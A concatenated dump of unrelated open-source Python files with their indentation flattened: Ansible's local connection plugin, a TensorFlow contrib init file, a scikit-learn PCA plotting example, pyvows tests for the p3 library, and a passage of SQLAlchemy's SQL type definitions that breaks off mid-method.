__metaclass__ = type
DOCUMENTATION = '''
connection: local
short_description: execute on controller
description:
- This connection plugin allows ansible to execute tasks on the Ansible 'controller' instead of on a remote host.
author: ansible (@core)
version_added: historical
notes:
- The remote user is ignored, the user with which the ansible CLI was executed is used instead.
'''
import os
import shutil
import subprocess
import fcntl
import getpass
import ansible.constants as C
from ansible.compat import selectors
from ansible.errors import AnsibleError, AnsibleFileNotFound
from ansible.module_utils.six import text_type, binary_type
from ansible.module_utils._text import to_bytes, to_native, to_text
from ansible.plugins.connection import ConnectionBase
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class Connection(ConnectionBase):
''' Local based connections '''
transport = 'local'
has_pipelining = True
def _connect(self):
''' connect to the local host; nothing to do here '''
# Because we haven't made any remote connection we're running as
# the local user, rather than as whatever is configured in
# remote_user.
self._play_context.remote_user = getpass.getuser()
if not self._connected:
display.vvv(u"ESTABLISH LOCAL CONNECTION FOR USER: {0}".format(self._play_context.remote_user), host=self._play_context.remote_addr)
self._connected = True
return self
def exec_command(self, cmd, in_data=None, sudoable=True):
''' run a command on the local host '''
super(Connection, self).exec_command(cmd, in_data=in_data, sudoable=sudoable)
display.debug("in local.exec_command()")
executable = C.DEFAULT_EXECUTABLE.split()[0] if C.DEFAULT_EXECUTABLE else None
display.vvv(u"EXEC {0}".format(to_text(cmd)), host=self._play_context.remote_addr)
display.debug("opening command with Popen()")
if isinstance(cmd, (text_type, binary_type)):
cmd = to_bytes(cmd)
else:
cmd = map(to_bytes, cmd)
p = subprocess.Popen(
cmd,
shell=isinstance(cmd, (text_type, binary_type)),
executable=executable, # cwd=...
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
display.debug("done running command with Popen()")
if self._play_context.prompt and sudoable:
fcntl.fcntl(p.stdout, fcntl.F_SETFL, fcntl.fcntl(p.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
fcntl.fcntl(p.stderr, fcntl.F_SETFL, fcntl.fcntl(p.stderr, fcntl.F_GETFL) | os.O_NONBLOCK)
selector = selectors.DefaultSelector()
selector.register(p.stdout, selectors.EVENT_READ)
selector.register(p.stderr, selectors.EVENT_READ)
become_output = b''
try:
while not self.check_become_success(become_output) and not self.check_password_prompt(become_output):
events = selector.select(self._play_context.timeout)
if not events:
stdout, stderr = p.communicate()
raise AnsibleError('timeout waiting for privilege escalation password prompt:\n' + to_native(become_output))
for key, event in events:
if key.fileobj == p.stdout:
chunk = p.stdout.read()
elif key.fileobj == p.stderr:
chunk = p.stderr.read()
if not chunk:
stdout, stderr = p.communicate()
raise AnsibleError('privilege output closed while waiting for password prompt:\n' + to_native(become_output))
become_output += chunk
finally:
selector.close()
if not self.check_become_success(become_output):
p.stdin.write(to_bytes(self._play_context.become_pass, errors='surrogate_or_strict') + b'\n')
fcntl.fcntl(p.stdout, fcntl.F_SETFL, fcntl.fcntl(p.stdout, fcntl.F_GETFL) & ~os.O_NONBLOCK)
fcntl.fcntl(p.stderr, fcntl.F_SETFL, fcntl.fcntl(p.stderr, fcntl.F_GETFL) & ~os.O_NONBLOCK)
display.debug("getting output with communicate()")
stdout, stderr = p.communicate(in_data)
display.debug("done communicating")
display.debug("done with local.exec_command()")
return (p.returncode, stdout, stderr)
def put_file(self, in_path, out_path):
''' transfer a file from local to local '''
super(Connection, self).put_file(in_path, out_path)
display.vvv(u"PUT {0} TO {1}".format(in_path, out_path), host=self._play_context.remote_addr)
if not os.path.exists(to_bytes(in_path, errors='surrogate_or_strict')):
raise AnsibleFileNotFound("file or module does not exist: {0}".format(to_native(in_path)))
try:
shutil.copyfile(to_bytes(in_path, errors='surrogate_or_strict'), to_bytes(out_path, errors='surrogate_or_strict'))
except shutil.Error:
raise AnsibleError("failed to copy: {0} and {1} are the same".format(to_native(in_path), to_native(out_path)))
except IOError as e:
raise AnsibleError("failed to transfer file to {0}: {1}".format(to_native(out_path), to_native(e)))
def fetch_file(self, in_path, out_path):
''' fetch a file from local to local -- for copatibility '''
super(Connection, self).fetch_file(in_path, out_path)
display.vvv(u"FETCH {0} TO {1}".format(in_path, out_path), host=self._play_context.remote_addr)
self.put_file(in_path, out_path)
def close(self):
''' terminate the connection; nothing to do here '''
self._connected = False
| gpl-3.0 |
ibab/tensorflow | tensorflow/contrib/__init__.py | 5 | 1621 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""contrib module containing volatile or experimental code."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Add projects here, they will show up under tf.contrib.
from tensorflow.contrib import ctc
from tensorflow.contrib import distributions
from tensorflow.contrib import framework
from tensorflow.contrib import grid_rnn
from tensorflow.contrib import layers
from tensorflow.contrib import learn
from tensorflow.contrib import linear_optimizer
from tensorflow.contrib import lookup
from tensorflow.contrib import losses
from tensorflow.contrib import metrics
from tensorflow.contrib import opt
from tensorflow.contrib import quantization
from tensorflow.contrib import rnn
from tensorflow.contrib import skflow
from tensorflow.contrib import tensor_forest
from tensorflow.contrib import testing
from tensorflow.contrib import util
from tensorflow.contrib import copy_graph
| apache-2.0 |
qifeigit/scikit-learn | examples/decomposition/plot_pca_3d.py | 354 | 2432 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=========================================================
Principal components analysis (PCA)
=========================================================
These figures aid in illustrating how a point cloud
can be very flat in one direction--which is where PCA
comes in to choose a direction that is not flat.
"""
print(__doc__)
# Authors: Gael Varoquaux
# Jaques Grobler
# Kevin Hughes
# License: BSD 3 clause
from sklearn.decomposition import PCA
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
###############################################################################
# Create the data
e = np.exp(1)
np.random.seed(4)
def pdf(x):
return 0.5 * (stats.norm(scale=0.25 / e).pdf(x)
+ stats.norm(scale=4 / e).pdf(x))
y = np.random.normal(scale=0.5, size=(30000))
x = np.random.normal(scale=0.5, size=(30000))
z = np.random.normal(scale=0.1, size=len(x))
density = pdf(x) * pdf(y)
pdf_z = pdf(5 * z)
density *= pdf_z
a = x + y
b = 2 * y
c = a - b + z
norm = np.sqrt(a.var() + b.var())
a /= norm
b /= norm
###############################################################################
# Plot the figures
def plot_figs(fig_num, elev, azim):
fig = plt.figure(fig_num, figsize=(4, 3))
plt.clf()
ax = Axes3D(fig, rect=[0, 0, .95, 1], elev=elev, azim=azim)
ax.scatter(a[::10], b[::10], c[::10], c=density[::10], marker='+', alpha=.4)
Y = np.c_[a, b, c]
# Using SciPy's SVD, this would be:
# _, pca_score, V = scipy.linalg.svd(Y, full_matrices=False)
pca = PCA(n_components=3)
pca.fit(Y)
pca_score = pca.explained_variance_ratio_
V = pca.components_
x_pca_axis, y_pca_axis, z_pca_axis = V.T * pca_score / pca_score.min()
x_pca_axis, y_pca_axis, z_pca_axis = 3 * V.T
x_pca_plane = np.r_[x_pca_axis[:2], - x_pca_axis[1::-1]]
y_pca_plane = np.r_[y_pca_axis[:2], - y_pca_axis[1::-1]]
z_pca_plane = np.r_[z_pca_axis[:2], - z_pca_axis[1::-1]]
x_pca_plane.shape = (2, 2)
y_pca_plane.shape = (2, 2)
z_pca_plane.shape = (2, 2)
ax.plot_surface(x_pca_plane, y_pca_plane, z_pca_plane)
ax.w_xaxis.set_ticklabels([])
ax.w_yaxis.set_ticklabels([])
ax.w_zaxis.set_ticklabels([])
elev = -40
azim = -80
plot_figs(1, elev, azim)
elev = 30
azim = 20
plot_figs(2, elev, azim)
plt.show()
| bsd-3-clause |
sammyt/p3 | tests/p3_select_all_vows.py | 1 | 3512 | from p3 import P3
from pyvows import Vows, expect
import lxml
from lxml.etree import ElementBase
from lxml.html import builder as E
from lxml.html import fromstring, tostring
from lxml.cssselect import CSSSelector
@Vows.batch
class SelectionSelectAll(Vows.Context):
class SelectBody(Vows.Context):
"""select(body)"""
def topic(self):
html = E.HTML(
E.HEAD(),
E.BODY(
E.DIV(E.CLASS('first')),
E.DIV(E.CLASS('second')))
)
return P3(html).select('body')
def select_all_matching(self, body):
div = body.select_all('div')
doc = div.root.document
expect(div[0][0]).to_equal(doc[1][0])
expect(div[0][1]).to_equal(doc[1][1])
def progrates_parent_to_selected(self, body):
div = body.select_all('div')
doc = div.root.document
expect(div[0].parent_node).to_equal(doc[1])
def does_not_propogate_data(self, body):
div = body.data(['a', 'b']).select_all('div')
ds = div.root.dataset
expect(ds.get(div[0][0], "nope")).to_equal('nope')
expect(ds.get(div[0][1], "nope")).to_equal('nope')
def returns_an_empty_array_if_no_match(self, body):
span = body.select_all('span')
expect(span).to_length(1)
expect(span[0]).to_length(0)
def can_select_by_function(self, body):
data = 'foo'
datas = []
indexes = []
nodes = []
doc = body.root.document
doc_body = doc[1]
def to_call(node, data, index):
datas.append(data)
indexes.append(index)
nodes.append(node)
return node.getchildren()
s = body.data([data]).select_all(to_call)
expect(datas).to_equal([data])
expect(indexes).to_equal([0])
expect(nodes).to_equal([doc_body])
expect(s[0][0]).to_equal(doc_body[0])
expect(s[0][1]).to_equal(doc_body[1])
class SelectAllDiv(Vows.Context):
"""select_all(div)"""
def topic(self):
html = E.HTML(
E.HEAD(),
E.BODY()
)
p3 = P3(html)
div = p3.select('body').select_all('div')\
.data(range(2)).enter().create("div")
div.create("span").attr("class", "first")
div.create("span").attr("class", "second")
return div
def select_all_mathching(self, div):
span = div.select_all('span')
expect(span).to_length(2)
expect(span[0]).to_length(2)
expect(span[0][0].getparent()).to_equal(div[0][0])
expect(span[0][1].getparent()).to_equal(div[0][0])
expect(span[1][0].getparent()).to_equal(div[0][1])
expect(span[1][1].getparent()).to_equal(div[0][1])
def propogates_parent_to_selected(self, div):
body = div.root.document[1]
span = div.select_all('span')
expect(span[0].parent_node).to_equal(body[0])
expect(span[1].parent_node).to_equal(body[1])
def returns_an_empty_array_if_no_match(self, div):
sub = div.select_all('div')
expect(sub).to_length(2)
expect(sub[0]).to_length(0)
expect(sub[1]).to_length(0)
| mit |
alex/sqlalchemy | lib/sqlalchemy/sql/sqltypes.py | 2 | 51062 | # sql/sqltypes.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""SQL specific types.
"""
import datetime as dt
import codecs
from .type_api import TypeEngine, TypeDecorator, to_instance
from .elements import quoted_name
from .default_comparator import _DefaultColumnComparator
from .. import exc, util, processors
from .base import _bind_or_error, SchemaEventTarget
from . import operators
from .. import event
from ..util import pickle
import decimal
if util.jython:
import array
class _DateAffinity(object):
"""Mixin date/time specific expression adaptations.
Rules are implemented within Date,Time,Interval,DateTime, Numeric,
Integer. Based on http://www.postgresql.org/docs/current/static
/functions-datetime.html.
"""
@property
def _expression_adaptations(self):
raise NotImplementedError()
class Comparator(TypeEngine.Comparator):
_blank_dict = util.immutabledict()
def _adapt_expression(self, op, other_comparator):
othertype = other_comparator.type._type_affinity
return op, \
to_instance(self.type._expression_adaptations.get(op, self._blank_dict).\
get(othertype, NULLTYPE))
comparator_factory = Comparator
class Concatenable(object):
"""A mixin that marks a type as supporting 'concatenation',
typically strings."""
class Comparator(TypeEngine.Comparator):
def _adapt_expression(self, op, other_comparator):
if op is operators.add and isinstance(other_comparator,
(Concatenable.Comparator, NullType.Comparator)):
return operators.concat_op, self.expr.type
else:
return op, self.expr.type
comparator_factory = Comparator
class String(Concatenable, TypeEngine):
"""The base for all string and character types.
In SQL, corresponds to VARCHAR. Can also take Python unicode objects
and encode to the database's encoding in bind params (and the reverse for
result sets.)
The `length` field is usually required when the `String` type is
used within a CREATE TABLE statement, as VARCHAR requires a length
on most databases.
"""
__visit_name__ = 'string'
def __init__(self, length=None, collation=None,
convert_unicode=False,
unicode_error=None,
_warn_on_bytestring=False
):
"""
Create a string-holding type.
:param length: optional, a length for the column for use in
DDL and CAST expressions. May be safely omitted if no ``CREATE
TABLE`` will be issued. Certain databases may require a
``length`` for use in DDL, and will raise an exception when
the ``CREATE TABLE`` DDL is issued if a ``VARCHAR``
with no length is included. Whether the value is
interpreted as bytes or characters is database specific.
:param collation: Optional, a column-level collation for
use in DDL and CAST expressions. Renders using the
COLLATE keyword supported by SQLite, MySQL, and Postgresql.
E.g.::
>>> from sqlalchemy import cast, select, String
>>> print select([cast('some string', String(collation='utf8'))])
SELECT CAST(:param_1 AS VARCHAR COLLATE utf8) AS anon_1
.. versionadded:: 0.8 Added support for COLLATE to all
string types.
:param convert_unicode: When set to ``True``, the
:class:`.String` type will assume that
input is to be passed as Python ``unicode`` objects,
and results returned as Python ``unicode`` objects.
If the DBAPI in use does not support Python unicode
(which is fewer and fewer these days), SQLAlchemy
will encode/decode the value, using the
value of the ``encoding`` parameter passed to
:func:`.create_engine` as the encoding.
When using a DBAPI that natively supports Python
unicode objects, this flag generally does not
need to be set. For columns that are explicitly
intended to store non-ASCII data, the :class:`.Unicode`
or :class:`UnicodeText`
types should be used regardless, which feature
the same behavior of ``convert_unicode`` but
also indicate an underlying column type that
directly supports unicode, such as ``NVARCHAR``.
For the extremely rare case that Python ``unicode``
is to be encoded/decoded by SQLAlchemy on a backend
that does natively support Python ``unicode``,
the value ``force`` can be passed here which will
cause SQLAlchemy's encode/decode services to be
used unconditionally.
:param unicode_error: Optional, a method to use to handle Unicode
conversion errors. Behaves like the ``errors`` keyword argument to
the standard library's ``string.decode()`` functions. This flag
requires that ``convert_unicode`` is set to ``force`` - otherwise,
SQLAlchemy is not guaranteed to handle the task of unicode
conversion. Note that this flag adds significant performance
overhead to row-fetching operations for backends that already
return unicode objects natively (which most DBAPIs do). This
flag should only be used as a last resort for reading
strings from a column with varied or corrupted encodings.
"""
if unicode_error is not None and convert_unicode != 'force':
raise exc.ArgumentError("convert_unicode must be 'force' "
"when unicode_error is set.")
self.length = length
self.collation = collation
self.convert_unicode = convert_unicode
self.unicode_error = unicode_error
self._warn_on_bytestring = _warn_on_bytestring
def bind_processor(self, dialect):
if self.convert_unicode or dialect.convert_unicode:
if dialect.supports_unicode_binds and \
self.convert_unicode != 'force':
if self._warn_on_bytestring:
def process(value):
if isinstance(value, util.binary_type):
util.warn("Unicode type received non-unicode bind "
"param value.")
return value
return process
else:
return None
else:
encoder = codecs.getencoder(dialect.encoding)
warn_on_bytestring = self._warn_on_bytestring
def process(value):
if isinstance(value, util.text_type):
return encoder(value, self.unicode_error)[0]
elif warn_on_bytestring and value is not None:
util.warn("Unicode type received non-unicode bind "
"param value")
return value
return process
else:
return None
def result_processor(self, dialect, coltype):
wants_unicode = self.convert_unicode or dialect.convert_unicode
needs_convert = wants_unicode and \
(dialect.returns_unicode_strings is not True or
self.convert_unicode == 'force')
if needs_convert:
to_unicode = processors.to_unicode_processor_factory(
dialect.encoding, self.unicode_error)
if dialect.returns_unicode_strings:
# we wouldn't be here unless convert_unicode='force'
# was specified, or the driver has erratic unicode-returning
# habits. since we will be getting back unicode
# in most cases, we check for it (decode will fail).
def process(value):
if isinstance(value, util.text_type):
return value
else:
return to_unicode(value)
return process
else:
# here, we assume that the object is not unicode,
# avoiding expensive isinstance() check.
return to_unicode
else:
return None
@property
def python_type(self):
if self.convert_unicode:
return util.text_type
else:
return str
def get_dbapi_type(self, dbapi):
return dbapi.STRING
class Text(String):
"""A variably sized string type.
In SQL, usually corresponds to CLOB or TEXT. Can also take Python
unicode objects and encode to the database's encoding in bind
params (and the reverse for result sets.) In general, TEXT objects
do not have a length; while some databases will accept a length
argument here, it will be rejected by others.
"""
__visit_name__ = 'text'
class Unicode(String):
"""A variable length Unicode string type.
The :class:`.Unicode` type is a :class:`.String` subclass
that assumes input and output as Python ``unicode`` data,
and in that regard is equivalent to the usage of the
``convert_unicode`` flag with the :class:`.String` type.
However, unlike plain :class:`.String`, it also implies an
underlying column type that is explicitly supporting of non-ASCII
data, such as ``NVARCHAR`` on Oracle and SQL Server.
This can impact the output of ``CREATE TABLE`` statements
and ``CAST`` functions at the dialect level, and can
also affect the handling of bound parameters in some
specific DBAPI scenarios.
The encoding used by the :class:`.Unicode` type is usually
determined by the DBAPI itself; most modern DBAPIs
feature support for Python ``unicode`` objects as bound
values and result set values, and the encoding should
be configured as detailed in the notes for the target
DBAPI in the :ref:`dialect_toplevel` section.
For those DBAPIs which do not support, or are not configured
to accommodate Python ``unicode`` objects
directly, SQLAlchemy does the encoding and decoding
outside of the DBAPI. The encoding in this scenario
is determined by the ``encoding`` flag passed to
:func:`.create_engine`.
When using the :class:`.Unicode` type, it is only appropriate
to pass Python ``unicode`` objects, and not plain ``str``.
If a plain ``str`` is passed under Python 2, a warning
is emitted. If you notice your application emitting these warnings but
you're not sure of the source of them, the Python
``warnings`` filter, documented at
http://docs.python.org/library/warnings.html,
can be used to turn these warnings into exceptions
which will illustrate a stack trace::
import warnings
warnings.simplefilter('error')
For an application that wishes to pass plain bytestrings
and Python ``unicode`` objects to the ``Unicode`` type
equally, the bytestrings must first be decoded into
unicode. The recipe at :ref:`coerce_to_unicode` illustrates
how this is done.
See also:
:class:`.UnicodeText` - unlengthed textual counterpart
to :class:`.Unicode`.
"""
__visit_name__ = 'unicode'
def __init__(self, length=None, **kwargs):
"""
Create a :class:`.Unicode` object.
Parameters are the same as that of :class:`.String`,
with the exception that ``convert_unicode``
defaults to ``True``.
"""
kwargs.setdefault('convert_unicode', True)
kwargs.setdefault('_warn_on_bytestring', True)
super(Unicode, self).__init__(length=length, **kwargs)
class UnicodeText(Text):
"""An unbounded-length Unicode string type.
See :class:`.Unicode` for details on the unicode
behavior of this object.
Like :class:`.Unicode`, usage the :class:`.UnicodeText` type implies a
unicode-capable type being used on the backend, such as
``NCLOB``, ``NTEXT``.
"""
__visit_name__ = 'unicode_text'
def __init__(self, length=None, **kwargs):
"""
Create a Unicode-converting Text type.
Parameters are the same as that of :class:`.Text`,
with the exception that ``convert_unicode``
defaults to ``True``.
"""
kwargs.setdefault('convert_unicode', True)
kwargs.setdefault('_warn_on_bytestring', True)
super(UnicodeText, self).__init__(length=length, **kwargs)
class Integer(_DateAffinity, TypeEngine):
"""A type for ``int`` integers."""
__visit_name__ = 'integer'
def get_dbapi_type(self, dbapi):
return dbapi.NUMBER
@property
def python_type(self):
return int
@util.memoized_property
def _expression_adaptations(self):
# TODO: need a dictionary object that will
# handle operators generically here, this is incomplete
return {
operators.add: {
Date: Date,
Integer: self.__class__,
Numeric: Numeric,
},
operators.mul: {
Interval: Interval,
Integer: self.__class__,
Numeric: Numeric,
},
operators.div: {
Integer: self.__class__,
Numeric: Numeric,
},
operators.truediv: {
Integer: self.__class__,
Numeric: Numeric,
},
operators.sub: {
Integer: self.__class__,
Numeric: Numeric,
},
}
class SmallInteger(Integer):
"""A type for smaller ``int`` integers.
Typically generates a ``SMALLINT`` in DDL, and otherwise acts like
a normal :class:`.Integer` on the Python side.
"""
__visit_name__ = 'small_integer'
class BigInteger(Integer):
"""A type for bigger ``int`` integers.
Typically generates a ``BIGINT`` in DDL, and otherwise acts like
a normal :class:`.Integer` on the Python side.
"""
__visit_name__ = 'big_integer'
class Numeric(_DateAffinity, TypeEngine):
"""A type for fixed precision numbers.
Typically generates DECIMAL or NUMERIC. Returns
``decimal.Decimal`` objects by default, applying
conversion as needed.
.. note::
The `cdecimal <http://pypi.python.org/pypi/cdecimal/>`_ library
is a high performing alternative to Python's built-in
``decimal.Decimal`` type, which performs very poorly in high volume
situations. SQLAlchemy 0.7 is tested against ``cdecimal`` and supports
it fully. The type is not necessarily supported by DBAPI
implementations however, most of which contain an import for plain
``decimal`` in their source code, even though some such as psycopg2
provide hooks for alternate adapters. SQLAlchemy imports ``decimal``
globally as well. The most straightforward and
foolproof way to use "cdecimal" given current DBAPI and Python support
is to patch it directly into sys.modules before anything else is
imported::
import sys
import cdecimal
sys.modules["decimal"] = cdecimal
While the global patch is a little ugly, it's particularly
important to use just one decimal library at a time since
Python Decimal and cdecimal Decimal objects
are not currently compatible *with each other*::
>>> import cdecimal
>>> import decimal
>>> decimal.Decimal("10") == cdecimal.Decimal("10")
False
SQLAlchemy will provide more natural support of
cdecimal if and when it becomes a standard part of Python
installations and is supported by all DBAPIs.
"""
__visit_name__ = 'numeric'
def __init__(self, precision=None, scale=None, asdecimal=True):
"""
Construct a Numeric.
:param precision: the numeric precision for use in DDL ``CREATE
TABLE``.
:param scale: the numeric scale for use in DDL ``CREATE TABLE``.
:param asdecimal: default True. Return whether or not
values should be sent as Python Decimal objects, or
as floats. Different DBAPIs send one or the other based on
datatypes - the Numeric type will ensure that return values
are one or the other across DBAPIs consistently.
When using the ``Numeric`` type, care should be taken to ensure
that the asdecimal setting is apppropriate for the DBAPI in use -
when Numeric applies a conversion from Decimal->float or float->
Decimal, this conversion incurs an additional performance overhead
for all result columns received.
DBAPIs that return Decimal natively (e.g. psycopg2) will have
better accuracy and higher performance with a setting of ``True``,
as the native translation to Decimal reduces the amount of floating-
point issues at play, and the Numeric type itself doesn't need
to apply any further conversions. However, another DBAPI which
returns floats natively *will* incur an additional conversion
overhead, and is still subject to floating point data loss - in
which case ``asdecimal=False`` will at least remove the extra
conversion overhead.
"""
self.precision = precision
self.scale = scale
self.asdecimal = asdecimal
def get_dbapi_type(self, dbapi):
return dbapi.NUMBER
@property
def python_type(self):
if self.asdecimal:
return decimal.Decimal
else:
return float
def bind_processor(self, dialect):
if dialect.supports_native_decimal:
return None
else:
return processors.to_float
def result_processor(self, dialect, coltype):
if self.asdecimal:
if dialect.supports_native_decimal:
# we're a "numeric", DBAPI will give us Decimal directly
return None
else:
util.warn('Dialect %s+%s does *not* support Decimal '
'objects natively, and SQLAlchemy must '
'convert from floating point - rounding '
'errors and other issues may occur. Please '
'consider storing Decimal numbers as strings '
'or integers on this platform for lossless '
'storage.' % (dialect.name, dialect.driver))
# we're a "numeric", DBAPI returns floats, convert.
if self.scale is not None:
return processors.to_decimal_processor_factory(
decimal.Decimal, self.scale)
else:
return processors.to_decimal_processor_factory(
decimal.Decimal)
else:
if dialect.supports_native_decimal:
return processors.to_float
else:
return None
@util.memoized_property
def _expression_adaptations(self):
return {
operators.mul: {
Interval: Interval,
Numeric: self.__class__,
Integer: self.__class__,
},
operators.div: {
Numeric: self.__class__,
Integer: self.__class__,
},
operators.truediv: {
Numeric: self.__class__,
Integer: self.__class__,
},
operators.add: {
Numeric: self.__class__,
Integer: self.__class__,
},
operators.sub: {
Numeric: self.__class__,
Integer: self.__class__,
}
}
class Float(Numeric):
"""A type for ``float`` numbers.
Returns Python ``float`` objects by default, applying
conversion as needed.
"""
__visit_name__ = 'float'
scale = None
def __init__(self, precision=None, asdecimal=False, **kwargs):
"""
Construct a Float.
:param precision: the numeric precision for use in DDL ``CREATE
TABLE``.
:param asdecimal: the same flag as that of :class:`.Numeric`, but
defaults to ``False``. Note that setting this flag to ``True``
results in floating point conversion.
:param \**kwargs: deprecated. Additional arguments here are ignored
by the default :class:`.Float` type. For database specific
floats that support additional arguments, see that dialect's
documentation for details, such as
:class:`sqlalchemy.dialects.mysql.FLOAT`.
"""
self.precision = precision
self.asdecimal = asdecimal
if kwargs:
util.warn_deprecated("Additional keyword arguments "
"passed to Float ignored.")
def result_processor(self, dialect, coltype):
if self.asdecimal:
return processors.to_decimal_processor_factory(decimal.Decimal)
else:
return None
@util.memoized_property
def _expression_adaptations(self):
return {
operators.mul: {
Interval: Interval,
Numeric: self.__class__,
},
operators.div: {
Numeric: self.__class__,
},
operators.truediv: {
Numeric: self.__class__,
},
operators.add: {
Numeric: self.__class__,
},
operators.sub: {
Numeric: self.__class__,
}
}
class DateTime(_DateAffinity, TypeEngine):
"""A type for ``datetime.datetime()`` objects.
Date and time types return objects from the Python ``datetime``
module. Most DBAPIs have built in support for the datetime
module, with the noted exception of SQLite. In the case of
SQLite, date and time types are stored as strings which are then
converted back to datetime objects when rows are returned.
"""
__visit_name__ = 'datetime'
def __init__(self, timezone=False):
"""Construct a new :class:`.DateTime`.
:param timezone: boolean. If True, and supported by the
backend, will produce 'TIMESTAMP WITH TIMEZONE'. For backends
that don't support timezone aware timestamps, has no
effect.
"""
self.timezone = timezone
def get_dbapi_type(self, dbapi):
return dbapi.DATETIME
@property
def python_type(self):
return dt.datetime
@util.memoized_property
def _expression_adaptations(self):
return {
operators.add: {
Interval: self.__class__,
},
operators.sub: {
Interval: self.__class__,
DateTime: Interval,
},
}
class Date(_DateAffinity, TypeEngine):
"""A type for ``datetime.date()`` objects."""
__visit_name__ = 'date'
def get_dbapi_type(self, dbapi):
return dbapi.DATETIME
@property
def python_type(self):
return dt.date
@util.memoized_property
def _expression_adaptations(self):
return {
operators.add: {
Integer: self.__class__,
Interval: DateTime,
Time: DateTime,
},
operators.sub: {
# date - integer = date
Integer: self.__class__,
# date - date = integer.
Date: Integer,
Interval: DateTime,
# date - datetime = interval,
# this one is not in the PG docs
# but works
DateTime: Interval,
},
}
class Time(_DateAffinity, TypeEngine):
"""A type for ``datetime.time()`` objects."""
__visit_name__ = 'time'
def __init__(self, timezone=False):
self.timezone = timezone
def get_dbapi_type(self, dbapi):
return dbapi.DATETIME
@property
def python_type(self):
return dt.time
@util.memoized_property
def _expression_adaptations(self):
return {
operators.add: {
Date: DateTime,
Interval: self.__class__
},
operators.sub: {
Time: Interval,
Interval: self.__class__,
},
}
class _Binary(TypeEngine):
"""Define base behavior for binary types."""
def __init__(self, length=None):
self.length = length
@property
def python_type(self):
return util.binary_type
# Python 3 - sqlite3 doesn't need the `Binary` conversion
# here, though pg8000 does to indicate "bytea"
def bind_processor(self, dialect):
DBAPIBinary = dialect.dbapi.Binary
def process(value):
if value is not None:
return DBAPIBinary(value)
else:
return None
return process
# Python 3 has native bytes() type
# both sqlite3 and pg8000 seem to return it,
# psycopg2 as of 2.5 returns 'memoryview'
if util.py2k:
def result_processor(self, dialect, coltype):
if util.jython:
def process(value):
if value is not None:
if isinstance(value, array.array):
return value.tostring()
return str(value)
else:
return None
else:
process = processors.to_str
return process
else:
def result_processor(self, dialect, coltype):
def process(value):
if value is not None:
value = bytes(value)
return value
return process
def coerce_compared_value(self, op, value):
"""See :meth:`.TypeEngine.coerce_compared_value` for a description."""
if isinstance(value, util.string_types):
return self
else:
return super(_Binary, self).coerce_compared_value(op, value)
def get_dbapi_type(self, dbapi):
return dbapi.BINARY
class LargeBinary(_Binary):
"""A type for large binary byte data.
The Binary type generates BLOB or BYTEA when tables are created,
and also converts incoming values using the ``Binary`` callable
provided by each DB-API.
"""
__visit_name__ = 'large_binary'
def __init__(self, length=None):
"""
Construct a LargeBinary type.
:param length: optional, a length for the column for use in
DDL statements, for those BLOB types that accept a length
(i.e. MySQL). It does *not* produce a small BINARY/VARBINARY
type - use the BINARY/VARBINARY types specifically for those.
May be safely omitted if no ``CREATE
TABLE`` will be issued. Certain databases may require a
*length* for use in DDL, and will raise an exception when
the ``CREATE TABLE`` DDL is issued.
"""
_Binary.__init__(self, length=length)
class Binary(LargeBinary):
"""Deprecated. Renamed to LargeBinary."""
def __init__(self, *arg, **kw):
util.warn_deprecated('The Binary type has been renamed to '
'LargeBinary.')
LargeBinary.__init__(self, *arg, **kw)
class SchemaType(SchemaEventTarget):
"""Mark a type as possibly requiring schema-level DDL for usage.
Supports types that must be explicitly created/dropped (i.e. PG ENUM type)
as well as types that are complimented by table or schema level
constraints, triggers, and other rules.
:class:`.SchemaType` classes can also be targets for the
:meth:`.DDLEvents.before_parent_attach` and
:meth:`.DDLEvents.after_parent_attach` events, where the events fire off
surrounding the association of the type object with a parent
:class:`.Column`.
.. seealso::
:class:`.Enum`
:class:`.Boolean`
"""
def __init__(self, **kw):
name = kw.pop('name', None)
if name is not None:
self.name = quoted_name(name, kw.pop('quote', None))
else:
self.name = None
self.schema = kw.pop('schema', None)
self.metadata = kw.pop('metadata', None)
self.inherit_schema = kw.pop('inherit_schema', False)
if self.metadata:
event.listen(
self.metadata,
"before_create",
util.portable_instancemethod(self._on_metadata_create)
)
event.listen(
self.metadata,
"after_drop",
util.portable_instancemethod(self._on_metadata_drop)
)
def _set_parent(self, column):
column._on_table_attach(util.portable_instancemethod(self._set_table))
def _set_table(self, column, table):
if self.inherit_schema:
self.schema = table.schema
event.listen(
table,
"before_create",
util.portable_instancemethod(
self._on_table_create)
)
event.listen(
table,
"after_drop",
util.portable_instancemethod(self._on_table_drop)
)
if self.metadata is None:
# TODO: what's the difference between self.metadata
# and table.metadata here ?
event.listen(
table.metadata,
"before_create",
util.portable_instancemethod(self._on_metadata_create)
)
event.listen(
table.metadata,
"after_drop",
util.portable_instancemethod(self._on_metadata_drop)
)
def copy(self, **kw):
return self.adapt(self.__class__)
def adapt(self, impltype, **kw):
schema = kw.pop('schema', self.schema)
metadata = kw.pop('metadata', self.metadata)
return impltype(name=self.name,
schema=schema,
metadata=metadata,
inherit_schema=self.inherit_schema,
**kw
)
@property
def bind(self):
return self.metadata and self.metadata.bind or None
def create(self, bind=None, checkfirst=False):
"""Issue CREATE ddl for this type, if applicable."""
if bind is None:
bind = _bind_or_error(self)
t = self.dialect_impl(bind.dialect)
if t.__class__ is not self.__class__ and isinstance(t, SchemaType):
t.create(bind=bind, checkfirst=checkfirst)
def drop(self, bind=None, checkfirst=False):
"""Issue DROP ddl for this type, if applicable."""
if bind is None:
bind = _bind_or_error(self)
t = self.dialect_impl(bind.dialect)
if t.__class__ is not self.__class__ and isinstance(t, SchemaType):
